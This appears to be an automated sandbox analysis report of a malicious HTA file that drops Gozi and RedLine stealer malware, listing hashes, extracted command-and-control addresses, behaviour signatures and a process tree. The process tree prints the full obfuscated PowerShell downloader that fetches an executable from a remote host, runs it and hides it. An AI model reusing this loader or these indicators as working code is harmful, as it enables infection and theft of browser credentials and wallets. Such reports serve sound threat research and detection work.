Analysis
-
max time kernel
109s -
max time network
106s -
platform
windows7_x64 -
resource
win7-20220715-en -
resource tags
arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system -
submitted
05-08-2022 01:33
Static task
static1
Behavioral task
behavioral1
Sample
55.hta
Resource
win7-20220715-en
General
-
Target
55.hta
-
Size
12KB
-
MD5
26ace4f34d7b5df03722125fe5280d4c
-
SHA1
7b9e7c2c60e66ec42061752d707ab70c3c84187a
-
SHA256
e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad
-
SHA512
5ad6cc4ae057d85a37f73b586ed0bbcf9857e7d918f302ba49772029d00bea6cb55d24f1249e33c0b2e05596fdaee813df0105032d96d91d56601b33b8555115
Malware Config
Extracted
gozi_ifsb
11111
trackingg-protectioon.cdn1.mozilla.net
194.76.225.168
194.76.224.242
-
base_path
/fonts/
-
build
250240
-
exe_type
loader
-
extension
.bak
-
server_id
50
Extracted
redline
bart
80.66.87.52:2500
-
auth_value
7d4c7c8f7ce4a858768b38d88316bd46
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1916-81-0x0000000000620000-0x0000000000664000-memory.dmp family_redline -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1876 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
bartor.exeWinZip.exepid process 1916 bartor.exe 1944 WinZip.exe -
Loads dropped DLL 3 IoCs
Processes:
powershell.execmd.exepid process 1876 powershell.exe 696 cmd.exe 696 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1876 powershell.exe 1876 powershell.exe 1876 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exebartor.exedescription pid process Token: SeDebugPrivilege 1876 powershell.exe Token: SeDebugPrivilege 1916 bartor.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
mshta.exepowershell.exebartor.execmd.execmd.exedescription pid process target process PID 1136 wrote to memory of 1876 1136 mshta.exe powershell.exe PID 1136 wrote to memory of 1876 1136 mshta.exe powershell.exe PID 1136 wrote to memory of 1876 1136 mshta.exe powershell.exe PID 1136 wrote to memory of 1876 1136 mshta.exe powershell.exe PID 1876 wrote to memory of 1916 1876 powershell.exe bartor.exe PID 1876 wrote to memory of 1916 1876 powershell.exe bartor.exe PID 1876 wrote to memory of 1916 1876 powershell.exe bartor.exe PID 1876 wrote to memory of 1916 1876 powershell.exe bartor.exe PID 1916 wrote to memory of 696 1916 bartor.exe cmd.exe PID 1916 wrote to memory of 696 1916 bartor.exe cmd.exe PID 1916 wrote to memory of 696 1916 bartor.exe cmd.exe PID 1916 wrote to memory of 696 1916 bartor.exe cmd.exe PID 696 wrote to memory of 1944 696 cmd.exe WinZip.exe PID 696 wrote to memory of 1944 696 cmd.exe WinZip.exe PID 696 wrote to memory of 1944 696 cmd.exe WinZip.exe PID 696 wrote to memory of 1944 696 cmd.exe WinZip.exe PID 1916 wrote to memory of 1580 1916 bartor.exe cmd.exe PID 1916 wrote to memory of 1580 1916 bartor.exe cmd.exe PID 1916 wrote to memory of 1580 1916 bartor.exe cmd.exe PID 1916 wrote to memory of 1580 1916 bartor.exe cmd.exe PID 1580 wrote to memory of 1444 1580 cmd.exe choice.exe PID 1580 wrote to memory of 1444 1580 cmd.exe choice.exe PID 1580 wrote to memory of 1444 1580 cmd.exe choice.exe PID 1580 wrote to memory of 1444 1580 cmd.exe choice.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Users\Admin\AppData\Roaming\bartor.exe"C:\Users\Admin\AppData\Roaming\bartor.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Users\Admin\Downloads\WinZip.exeC:\Users\Admin\Downloads\WinZip.exe5⤵
- Executes dropped EXE
PID:1944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 75⤵PID:1444
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
494KB
MD50f2be4fe0362766dcf339d4c03326bc4
SHA169e26e9e75e8a8359d232d8e14318b9235e1a828
SHA2562f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA5128d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150
-
Filesize
494KB
MD50f2be4fe0362766dcf339d4c03326bc4
SHA169e26e9e75e8a8359d232d8e14318b9235e1a828
SHA2562f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA5128d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150
-
Filesize
338KB
MD5468042278a3e4841d3e33ccca10d99ca
SHA122532f37096a200d448420359c01bbebaaf6b820
SHA256b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA5124c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf
-
Filesize
338KB
MD5468042278a3e4841d3e33ccca10d99ca
SHA122532f37096a200d448420359c01bbebaaf6b820
SHA256b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA5124c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf
-
Filesize
494KB
MD50f2be4fe0362766dcf339d4c03326bc4
SHA169e26e9e75e8a8359d232d8e14318b9235e1a828
SHA2562f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA5128d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150
-
Filesize
338KB
MD5468042278a3e4841d3e33ccca10d99ca
SHA122532f37096a200d448420359c01bbebaaf6b820
SHA256b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA5124c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf
-
Filesize
338KB
MD5468042278a3e4841d3e33ccca10d99ca
SHA122532f37096a200d448420359c01bbebaaf6b820
SHA256b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA5124c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf